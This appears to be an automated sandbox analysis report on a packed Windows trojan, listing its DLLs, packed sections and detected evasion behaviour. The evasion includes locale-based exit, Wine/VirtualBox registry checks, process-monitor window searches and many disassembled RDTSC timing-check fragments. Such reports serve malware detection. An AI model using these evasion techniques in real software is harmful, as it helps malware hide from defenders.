              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008CA61B0_2_008CA61B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0097B6240_2_0097B624
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008D56300_2_008D5630
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008897EC0_2_008897EC
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008137210_2_00813721
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008D2F400_2_008D2F40
              Source: C:\Users\user\Desktop\file.exeCode function: String function: 00514A60 appears 316 times
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: file.exeStatic PE information: Section: enovjnaf ZLIB complexity 0.9947812263615734
              Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00533A50 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_00533A50
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0052CAE0 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_0052CAE0
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Q3N88L0X.htmJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
              Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
              Source: file.exeStatic file information: File size 1798144 > 1048576
              Source: file.exeStatic PE information: Raw size of enovjnaf is bigger than: 0x100000 < 0x19d200

              Data Obfuscation

              barindex
              Detected unpacking (changes PE section rights)
              Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.510000.0.unpack :EW;.rsrc:W;.idata :W; :EW;enovjnaf:EW;oxoldoae:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;enovjnaf:EW;oxoldoae:EW;.taggant:EW;
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00536390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00536390
              Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
              Source: file.exeStatic PE information: real checksum: 0x1c106b should be: 0x1c6889
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: enovjnaf
              Source: file.exeStatic PE information: section name: oxoldoae
              Source: file.exeStatic PE information: section name: .taggant
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0090289C push eax; mov dword ptr [esp], ebp0_2_0090290E
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00959886 push ebx; mov dword ptr [esp], ecx0_2_009598DF
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00959886 push edx; mov dword ptr [esp], ebx0_2_00959946
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009468B8 push 2404F600h; mov dword ptr [esp], ecx0_2_00946873
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009468B8 push 2FE62BBAh; mov dword ptr [esp], ecx0_2_00946892
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009468B8 push eax; mov dword ptr [esp], 7FCCDDCFh0_2_009468D4
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009468B8 push 20CA5969h; mov dword ptr [esp], edx0_2_00946906
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009468B8 push esi; mov dword ptr [esp], ecx0_2_00946937
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009468B8 push 143AEFB3h; mov dword ptr [esp], esp0_2_00946972
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009468B8 push 66B6CC7Fh; mov dword ptr [esp], eax0_2_0094699E
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008FF8CC push 61AD98A5h; mov dword ptr [esp], esi0_2_008FF8F3
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008FF8CC push edx; mov dword ptr [esp], 061075B6h0_2_008FF907
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008FF8CC push eax; mov dword ptr [esp], ecx0_2_008FF927
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00970810 push eax; mov dword ptr [esp], edx0_2_0097085A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0083601D push 532D50CEh; mov dword ptr [esp], ecx0_2_00836095
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0083601D push esi; mov dword ptr [esp], edx0_2_008360C6
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0083601D push 503E0754h; mov dword ptr [esp], eax0_2_00836118
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0083601D push 1FB9673Bh; mov dword ptr [esp], ebx0_2_008361CC
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0083601D push ebx; mov dword ptr [esp], eax0_2_0083620F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008DC023 push eax; mov dword ptr [esp], ebp0_2_008DC033
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00537895 push ecx; ret 0_2_005378A8
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009F4055 push eax; mov dword ptr [esp], edx0_2_009F4081
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009F4055 push 711618C3h; mov dword ptr [esp], ecx0_2_009F40BC
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009F4055 push edi; mov dword ptr [esp], 37BB2BC3h0_2_009F4189
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009F4055 push esi; mov dword ptr [esp], 70120483h0_2_009F419F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0080805B push edi; mov dword ptr [esp], esi0_2_00808099
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009BD18B push esi; mov dword ptr [esp], eax0_2_009BD19C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0099898F push edx; mov dword ptr [esp], 7FBF61A0h0_2_009989B3
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0099898F push 7E81CA36h; mov dword ptr [esp], eax0_2_009989EA
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0099898F push ebx; mov dword ptr [esp], ebp0_2_00998A2B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0099898F push edx; mov dword ptr [esp], 66786D3Ah0_2_00998A48
              Source: file.exeStatic PE information: section name: enovjnaf entropy: 7.954450679533088

              Boot Survival

              barindex
              Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00536390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00536390

              Malware Analysis System Evasion

              barindex
              Found evasive API chain (may stop execution after checking locale)
              Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-25960
              Tries to detect sandboxes / dynamic malware analysis system (registry check)
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
              Tries to detect virtualization through RDTSC time measurements
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75FF4D second address: 75FF6C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 je 00007FD978BA9B16h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jg 00007FD978BA9B20h 0x00000015 jmp 00007FD978BA9B1Ah 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75FF6C second address: 75FF87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD979248A87h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75F7B6 second address: 75F7BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C505E second address: 8C5064 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DBE82 second address: 8DBE86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DBE86 second address: 8DBEE8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD979248A89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FD979248A7Ch 0x0000000f jmp 00007FD979248A7Eh 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jnc 00007FD979248A90h 0x0000001d push eax 0x0000001e push edx 0x0000001f ja 00007FD979248A76h 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DBEE8 second address: 8DBEEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DBEEC second address: 8DBEF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DC314 second address: 8DC324 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FD978BA9B22h 0x00000008 jp 00007FD978BA9B16h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DC5E5 second address: 8DC5E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DC5E9 second address: 8DC5EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DF5FC second address: 8DF663 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007FD979248A88h 0x0000000c pop ebx 0x0000000d popad 0x0000000e add dword ptr [esp], 40046420h 0x00000015 mov dword ptr [ebp+122D1BF7h], ebx 0x0000001b push esi 0x0000001c jnc 00007FD979248A7Ch 0x00000022 mov ecx, dword ptr [ebp+122D3659h] 0x00000028 pop edx 0x00000029 push 00000003h 0x0000002b mov dh, bl 0x0000002d push 00000000h 0x0000002f mov esi, dword ptr [ebp+122D18AAh] 0x00000035 push 00000003h 0x00000037 or dword ptr [ebp+122D2233h], ebx 0x0000003d call 00007FD979248A79h 0x00000042 push eax 0x00000043 push edx 0x00000044 jnl 00007FD979248A7Ch 0x0000004a ja 00007FD979248A76h 0x00000050 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DF663 second address: 8DF6B6 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FD978BA9B18h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007FD978BA9B2Ch 0x00000014 pop edx 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 push eax 0x0000001a jng 00007FD978BA9B1Ch 0x00000020 pop eax 0x00000021 mov eax, dword ptr [eax] 0x00000023 jmp 00007FD978BA9B1Bh 0x00000028 mov dword ptr [esp+04h], eax 0x0000002c push esi 0x0000002d push eax 0x0000002e push edx 0x0000002f push edi 0x00000030 pop edi 0x00000031 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DF6B6 second address: 8DF6DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD979248A7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a pop eax 0x0000000b mov si, dx 0x0000000e lea ebx, dword ptr [ebp+12453502h] 0x00000014 xor dx, EC0Dh 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d push edi 0x0000001e pop edi 0x0000001f pushad 0x00000020 popad 0x00000021 popad 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DF6DE second address: 8DF6E3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DF741 second address: 8DF745 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DF745 second address: 8DF84B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov dword ptr [esp], eax 0x0000000a call 00007FD978BA9B28h 0x0000000f call 00007FD978BA9B26h 0x00000014 mov dword ptr [ebp+122D1803h], ecx 0x0000001a pop edi 0x0000001b pop edx 0x0000001c push 00000000h 0x0000001e mov dword ptr [ebp+122D1991h], ecx 0x00000024 pushad 0x00000025 pushad 0x00000026 mov bx, 57F1h 0x0000002a mov ax, si 0x0000002d popad 0x0000002e mov dword ptr [ebp+122D2A11h], eax 0x00000034 popad 0x00000035 push 31A692D9h 0x0000003a jno 00007FD978BA9B29h 0x00000040 xor dword ptr [esp], 31A69259h 0x00000047 sub si, 5A29h 0x0000004c pushad 0x0000004d mov ebx, dword ptr [ebp+122D2233h] 0x00000053 mov dword ptr [ebp+122D1BA5h], edi 0x00000059 popad 0x0000005a push 00000003h 0x0000005c call 00007FD978BA9B29h 0x00000061 and ecx, dword ptr [ebp+122D35D5h] 0x00000067 pop edi 0x00000068 movzx esi, bx 0x0000006b push 00000000h 0x0000006d xor edi, 69B6DC56h 0x00000073 push 00000003h 0x00000075 jns 00007FD978BA9B2Bh 0x0000007b call 00007FD978BA9B19h 0x00000080 push eax 0x00000081 push edx 0x00000082 pushad 0x00000083 jmp 00007FD978BA9B28h 0x00000088 jbe 00007FD978BA9B16h 0x0000008e popad 0x0000008f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DF84B second address: 8DF88C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD979248A7Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FD979248A83h 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 push edi 0x00000014 jno 00007FD979248A78h 0x0000001a pop edi 0x0000001b mov eax, dword ptr [eax] 0x0000001d push eax 0x0000001e push edx 0x0000001f jbe 00007FD979248A7Ch 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DF88C second address: 8DF890 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DF890 second address: 8DF8BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD979248A80h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jg 00007FD979248A7Ch 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DF8BA second address: 8DF8FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD978BA9B29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a sub dword ptr [ebp+122D1B7Ch], ebx 0x00000010 lea ebx, dword ptr [ebp+1245350Bh] 0x00000016 push eax 0x00000017 sub esi, dword ptr [ebp+122D3489h] 0x0000001d pop edi 0x0000001e mov dword ptr [ebp+122D18A4h], eax 0x00000024 xchg eax, ebx 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 push edx 0x00000029 pop edx 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DF8FA second address: 8DF8FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DF8FF second address: 8DF920 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD978BA9B27h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DF920 second address: 8DF924 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DF924 second address: 8DF928 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DFAC4 second address: 8DFACB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DFACB second address: 8DFAD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FF137 second address: 8FF13B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FF13B second address: 8FF13F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FF13F second address: 8FF15B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FD979248A81h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FF15B second address: 8FF166 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FF166 second address: 8FF16C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FF16C second address: 8FF171 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FF587 second address: 8FF58D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FF6E4 second address: 8FF6EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FF6EA second address: 8FF6EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FF6EE second address: 8FF6FA instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD978BA9B16h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FF6FA second address: 8FF70A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FD979248A76h 0x0000000a jbe 00007FD979248A76h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FF70A second address: 8FF726 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FD978BA9B1Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jbe 00007FD978BA9B16h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FF726 second address: 8FF72A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FF72A second address: 8FF72E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FF72E second address: 8FF734 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FF9C4 second address: 8FF9C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FF9C8 second address: 8FF9E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD979248A7Ch 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007FD979248A76h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FF9E2 second address: 8FF9EA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FFDC5 second address: 8FFDC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 900EDB second address: 900EF0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jno 00007FD978BA9B1Ah 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 904F62 second address: 904F7F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD979248A89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 904F7F second address: 904FA8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD978BA9B25h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jng 00007FD978BA9B28h 0x00000011 push eax 0x00000012 push edx 0x00000013 je 00007FD978BA9B16h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CBD10 second address: 8CBD16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CBD16 second address: 8CBD1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9079B8 second address: 9079BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9079BE second address: 9079D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD978BA9B22h 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9079D5 second address: 9079E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 js 00007FD979248A76h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C6B64 second address: 8C6B96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FD978BA9B26h 0x0000000d jmp 00007FD978BA9B24h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90BDB4 second address: 90BDC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD979248A7Ch 0x00000009 rdtsc
